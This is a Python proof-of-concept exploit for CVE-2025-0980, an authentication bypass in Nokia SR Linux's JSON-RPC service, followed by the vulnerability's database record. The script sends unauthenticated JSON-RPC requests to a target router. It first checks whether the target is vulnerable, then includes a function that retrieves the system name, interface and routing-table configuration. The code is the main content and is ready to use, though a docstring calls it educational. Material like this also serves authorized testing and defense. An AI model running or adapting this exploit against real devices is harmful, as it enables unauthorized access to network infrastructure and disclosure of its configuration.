CVE-2025-0980

#!/usr/bin/env python3 """ CVE-2025-0980 PoC - Nokia SR Linux JSON-RPC Authentication Bypass Note: This PoC is for educational and authorized testing purposes only. """ import json import requests from requests.auth import HTTPBasicAuth TARGET_IP = "<target_ip>" TARGET_PORT = 8080 JSON_RPC_ENDPOINT = f"http://{TARGET_IP}:{TARGET_PORT}/jsonrpc" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-0980 by attempting to access JSON-RPC without valid credentials. """ # Craft a JSON-RPC request to get system information payload = { "jsonrpc": "2.0", "method": "get", "params": { "path": "/system/name", "datastore": "running" }, "id": 1 } headers = { "Content-Type": "application/json", "User-Agent": "CVE-2025-0980-PoC" } try: # Attempt request without authentication response = requests.post( JSON_RPC_ENDPOINT, json=payload, headers=headers, timeout=10 ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") # Check if we got a successful response without auth if response.status_code == 200: data = response.json() if 'result' in data or ('error' not in data): print("[!] VULNERABLE: JSON-RPC accessible without authentication!") return True print("[*] Target may not be vulnerable or is patched.") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False def exploit_configuration_disclosure(): """ Exploit to retrieve sensitive configuration information. """ payloads = [ {"jsonrpc": "2.0", "method": "get", "params": {"path": "/system/name", "datastore": "running"}, "id": 1}, {"jsonrpc": "2.0", "method": "get", "params": {"path": "/interface", "datastore": "running"}, "id": 2}, {"jsonrpc": "2.0", "method": "get", "params": {"path": "/routing-table", "datastore": "running"}, "id": 3} ] for payload in payloads: try: response = requests.post( JSON_RPC_ENDPOINT, json=payload, headers={"Content-Type": "application/json"}, timeout=10 ) if response.status_code == 200: print(f"[*] Retrieved data for {payload['params']['path']}: {response.text}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-0980 - Nokia SR Linux JSON-RPC Auth Bypass PoC") print("=" * 60) check_vulnerability()

{"cve": {"id": "CVE-2025-0980", "sourceIdentifier": "b48c3b8f-639e-4c16-8725-497bc411dad0", "published": "2026-01-07T12:16:45.973", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nokia SR Linux is vulnerable to an authentication vulnerability allowing unauthorized access to the JSON-RPC service. When exploited, an invalid validation allows JSON RPC access without providing valid authentication credentials."}, {"lang": "es", "value": "Nokia SR Linux es vulnerable a una vulnerabilidad de autenticación que permite el acceso no autorizado al servicio JSON-RPC. Cuando se explota, una validación inválida permite el acceso a JSON RPC sin proporcionar credenciales de autenticación válidas."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://www.nokia.com/we-are-nokia/security/product-security-advisory/CVE-2025-0980/", "source": "b48c3b8f-639e-4c16-8725-497bc411dad0"}]}}